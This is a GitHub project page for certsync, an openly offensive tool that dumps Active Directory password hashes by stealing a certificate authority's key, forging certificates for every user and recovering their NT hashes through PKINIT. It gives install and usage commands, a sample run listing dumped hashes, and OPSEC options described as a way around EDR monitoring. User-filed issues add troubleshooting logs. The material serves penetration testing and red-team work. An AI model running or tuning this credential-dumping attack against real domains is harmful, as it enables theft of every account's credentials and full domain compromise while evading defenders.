zblurx / certsync Goto Github PK

Dump NTDS with golden certificates and UnPAC the hash

License: MIT License

Makefile 1.79% Python 98.21%

certsync's Introduction

certsync

certsync is a new technique in order to dump NTDS remotely, but this time without DRSUAPI: it uses golden certificate and UnPAC the hash. It works in several steps:

Dump user list, CA informations and CRL from LDAP
Dump CA certificate and private key
Forge offline a certificate for every user
UnPAC the hash for every user in order to get nt and lm hashes

$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

Contrary to what we may think, the attack is not at all slower.

certsync
- Table of Contents
- Installation
- Usage
- Why
- Requirements
- Limitations
- OPSEC
- Credits

Installation

Locally:

git clone https://github.com/zblurx/certsync
cd certsync
pip install .

From Pypi:

pip install certsync

From BlackArch:

pacman -S certsync

All OS distribution packages:

Usage

$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]
                [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]
                [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

Dump NTDS with golden certificates and UnPAC the hash

options:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -outputfile OUTPUTFILE
                        base output filename

CA options:
  -ca-pfx pfx/p12 file name
                        Path to CA certificate. If used, will skip backup of CA certificate and private key
  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

authentication options:
  -d domain.local, -domain domain.local
                        Domain name
  -u username, -username username
                        Username
  -p password, -password password
                        Password
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
                        credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection options:
  -scheme ldap scheme
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

OPSEC options:
  -ldap-filter LDAP_FILTER
                        ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
  -template cert.pfx    base template to use in order to forge certificates
  -timeout timeout      Timeout between PKINIT connection
  -jitter jitter        Jitter between PKINIT connection
  -randomize            Randomize certificate generation. Takes longer to generate all the certificates

Why

DSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, certsync does not require to use a Domain Administrator, it only require a CA Administrator.

Requirements

This attack needs:

A configured Entreprise CA on an ADCS server in the domain,
PKINIT working,
An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.

Limitations

Since we cannot PKINIT for users that are revoked, we cannot dump thier hashes.

OPSEC

Some options were added to customize the behaviour of the tool:

-ldap-filter: change the LDAP filter used to select usernames to certsync.
-template: use an already delivered certificate to mimic it when forging users certificates.
-timeout and -jitter: change timeout between PKINIT authentication requests.
-randomize: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.

Credits

Olivier Lyak for all his work on ADCS and certipy.
Benjamin Delpy for the unPAC the hash technique.
Will Schroeder and Lee Christensen for Certified Pre-Owned and Certify.
Mayfly for his great lab: GOAD.

certsync's People

Contributors

Stargazers

Watchers

certsync's Issues

couldn't dumped

There is such a situation, its a test evironment, Before i could get the hashes with this user. after i reinstalled the certificate server and configured it but now icouldt get the hashes with same user.

└─$ certsync -u Administrator -p 'passpass' -d test.local -dc-ip 10.10.10.10 -ns 10.10.10.10 -debug
[] Collecting userlist, CA info and CRL on LDAP
[] Found 15 users in LDAP
[] Found CA test-WIN-abcabc-CA on WIN-abcabc.test.local(10.10.10.10)
[] Dumping CA certificate and private key
[+] Creating new service
[+] Creating backup
[+] Retrieving backup
[+] Cleaning up
[] Forging certificates for every users. This can take some time...
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 15/15 [00:00<00:00, 987.45it/s]
[] PKINIT + UnPAC the hashes
[+] 0 users dumped. 15 users could not be dumped.

Is this caused by pkinit? how could i set up test environment for this tool on active directory?

cryptography.exceptions.UnsupportedAlgorithm: Hash algorithm "sha1" not supported for signatures

Was trying to use this and kept getting this error:

File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 610, in main certsync.run() File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 237, in run user.forge_cert(key=base_user_key, cert=base_user_cert, ca_key=self.ca_key, ca_cert=self.ca_cert) File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 64, in forge_cert cert = cert.sign(ca_key, signature_hash_algorithm()) File "/usr/local/lib/python3.9/dist-packages/cryptography/x509/base.py", line 940, in sign return rust_x509.create_x509_certificate(self, private_key, algorithm) cryptography.exceptions.UnsupportedAlgorithm: Hash algorithm "sha1" not supported for signatures

I was able to fix with:

python3.9 -m pip install cryptography==38.0.1

Apparently python crypto library removed support for SHA1

Authenticating using a CA certificate and matching private key

Hi,

Thank you for this tool!

I am having trouble authenticating using a CA certificate and it's matching private key which I dumped from the ADCS server using Certipy beforehand. What am I doing wrong?

Tag the source

It would be very helpful if you could tag releases. This would enable distributions to fetch the source from GitHub instead of PyP.

Thanks

'NoneType' object has no attribute 'subject'

testing this out and getting the above error from multiple CA servers. here is the full command i'm running with debug output.

└─$ python3 entry.py -u xxxx-p "xxxxxxx" -d xxxxx -dc-ip x.x.x.x -ns x.x.x.x -debug
[] Collecting userlist, CA info and CRL on LDAP
[] Found 1xxxxx users in LDAP
[-] Too much CA, need to select one specific
[*] Please select one:
[0] xxxxx
[1] xxxxxx
[2] xxxxx
[3] xxxxx

3
[] Found CA xxxxx on xxxxxxxx
[] Dumping CA certificate and private key
[-] Failed to connect to Service Control Manager Remote Protocol
[*] Forging certificates for every users. This can take some time...
[-] Got error: 'NoneType' object has no attribute 'subject'
Traceback (most recent call last):
File "/home/kali/certsync/certsync/entry.py", line 602, in main
certsync.run()
File "/home/kali/certsync/certsync/entry.py", line 229, in run
base_user_key, base_user_cert = self.forge_cert_base()
File "/home/kali/certsync/certsync/entry.py", line 254, in forge_cert_base
cert = cert.issuer_name(self.ca_cert.subject)
AttributeError: 'NoneType' object has no attribute 'subject'

socket ssl wrapping error: [Errno 104] Connection reset by peer

Hi, I got this error after the following command:

certsync -u username -p password -d xxx.local -dc-ip 10.x.x.x -ns 10.x.x.x

[*] Collecting userlist, CA info and CRL on LDAP
[-] Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer
[-] Use -debug to print a stacktrace

How can I fix it ?

AttributeError: 'list' object has no attribute 'split'

Hello Team,

I have updated my Kali Linux and it seems Python has also updated to 3.11.2. When I run the command it throws an error

certsync -d adlab.com -u Administrator -hashes aad3b435b51404eeaad3b435b51404ee:64cbb76dcafe2e977794f6251f8231fb -dc-ip 192.168.126.146 -randomize -ldap-filter "(&(|(objectCategory=person)))" -debug
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 5 users in LDAP
[*] Found CA adlab-WIN-3MBDJTT1P21-CA on WIN-3MBDJTT1P21.adlab.com(192.168.126.146)
[*] Dumping CA certificate and private key
[-] Got error: 'list' object has no attribute 'split'
Traceback (most recent call last):
  File "/home/kali/.local/lib/python3.11/site-packages/certsync/entry.py", line 608, in main
    certsync.run()
  File "/home/kali/.local/lib/python3.11/site-packages/certsync/entry.py", line 206, in run
    ca_target = Target.create(
                ^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/certipy_ad-4.4.0-py3.11.egg/certipy/lib/target.py", line 339, in create
    hashes = hashes.split(":")
             ^^^^^^^^^^^^
AttributeError: 'list' object has no attribute 'split'

Python version
python3 --version
Python 3.11.2

Also, I have updated my certipy to 4.4.0

Got error: 'latin-1' codec can't encode characters in position 0-12: ordinal not in range(256)

Hi, I'm testing certsync and getting following decoding error:

[*] Collecting userlist, CA info and CRL on LDAP
[*] Found XX users in LDAP
[*] Loading CA certificate and private key from administrator.pfx
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
[-] Got error: 'latin-1' codec can't encode characters in position 0-12: ordinal not in range(256)
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 615, in main
    certsync.run()
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 252, in run
    if user.auth(target=self.target):
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 74, in auth
    return self.authenticate(auth=auth)
  File "/usr/local/lib/python3.9/dist-packages/certsync/entry.py", line 94, in authenticate
    if auth.kerberos_authentication(
  File "/usr/local/lib/python3.9/dist-packages/certipy/commands/auth.py", line 355, in kerberos_authentication
    as_req, diffie = build_pkinit_as_req(username, domain, self.key, self.cert)
  File "/usr/local/lib/python3.9/dist-packages/certipy/lib/pkinit.py", line 285, in build_pkinit_as_req
    kdc_req_body_data['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3430, in __init__
    raise e
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3414, in __init__
    self.__setitem__(key, value[key])
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3570, in __setitem__
    new_value = self._make_value(field_name, field_spec, value_spec, field_params, value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 3825, in _make_value
    new_value = value_spec(value, **field_params)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4204, in __init__
    raise e
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4195, in __init__
    self.__setitem__(index, child)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4352, in __setitem__
    new_value = self._make_value(value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 4302, in _make_value
    return self._child_spec(value=value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 1677, in __init__
    raise e
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 1669, in __init__
    self.set(value)
  File "/usr/local/lib/python3.9/dist-packages/asn1crypto/core.py", line 1797, in set
    self.contents = value.encode(self._encoding)
UnicodeEncodeError: 'latin-1' codec can't encode characters in position 0-12: ordinal not in range(256)

It worth to mention that there are cyrillic users in AD. I was trying to look into different places and even patched asn1crypto/core.py with using utf-8 instead of latin-1. However it didn't help: exception gone, but result was [+] 0 users dumped.

P.S. It may be a problem of my lab since I'm not able to dump hash for single user (proper encoding). Feel free to ignore this issue so far

Socket ssl wrapping error: [Errno 54] Connection reset by peer

Hi, I got this error:
[*] Collecting userlist, CA info and CRL on LDAP
[-] Got error: socket ssl wrapping error: [Errno 54] Connection reset by peer
[-] Use -debug to print a stacktrace

This is when I use - debug
[-] Got error: socket ssl wrapping error: [Errno 54] Connection reset by peer
Traceback (most recent call last):
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 77, in connect
self.connect(version=ssl.PROTOCOL_TLSv1_2)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 128, in connect
bind_result = ldap_conn.bind()
File "/Users/test.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/core/connection.py", line 589, in bind
self.open(read_server_info=False)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/sync.py", line 57, in open
BaseStrategy.open(self, reset_usage, read_server_info)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/base.py", line 146, in open
raise exception_history[0][0]
ldap3.core.exceptions.LDAPSocketOpenError: socket ssl wrapping error: [Errno 54] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certsync/entry.py", line 602, in main
certsync.run()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certsync/entry.py", line 169, in run
self.init_ldap_conn()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certsync/entry.py", line 161, in init_ldap_conn
self.ldap_connection.connect()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 83, in connect
self.connect(version=ssl.PROTOCOL_TLSv1)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/certipy/lib/ldap.py", line 128, in connect
bind_result = ldap_conn.bind()
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/core/connection.py", line 589, in bind
self.open(read_server_info=False)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/sync.py", line 57, in open
BaseStrategy.open(self, reset_usage, read_server_info)
File "/Users/test/.pyenv/versions/3.7.13/lib/python3.7/site-packages/ldap3/strategy/base.py", line 146, in open
raise exception_history[0][0]
ldap3.core.exceptions.LDAPSocketOpenError: socket ssl wrapping error: [Errno 54] Connection reset by peer

Is this issue caused by firewall?
Thank you.

Kerberos auth not working

taget_name is None when doing Kerberos auth

'list' object has no attribute 'split' when choosing multiple CIs

Hello Team,

During one of the assessments, it was observed that the org has multiple CIs and asked to choose one when I select and got an error

[] Found 1 user in LDAP
[-] Too much CA, need to select one specific
[] Please select one:
[0] ISSUING-test1 at test1.adblab.com
[1] ISSUING-test2 at test2.adblab.com
[2] Issuing-test3 at test3.adblab.com

2
[] Found CA ISSUING-test2 on test2.adblab.com
[] Dumping CA certificate and private key
[-] Got error: 'list' object has no attribute 'split'
[-] Use -debug to print a stacktrace

I have used both on certipy v 4.4 and 4.3 and python version 3.10 and 3.11 but still got the same error. It would be great if you can help on this

Wrong link for Golden Certificate

Resource linked in the README for Golden Certificate is not the right one.

CertSync relies on the extraction of the CA cert private key, to forge and sign certificates (this is called Golden Certificate) in order to do UnPAC-the-hash later on.

The resource indicated in the README (https://cyberstoph.org/posts/2019/12/an-introduction-to-golden-certificates/) refers to a different technique, but called the same. The technique shown in the post relies on DPERSIST3, where the attacker has enough privileges against a certificate template, to modify it and make it a SmartCard certificate template.

More info: https://www.thehacker.recipes/ad/persistence/ad-cs/golden-certificate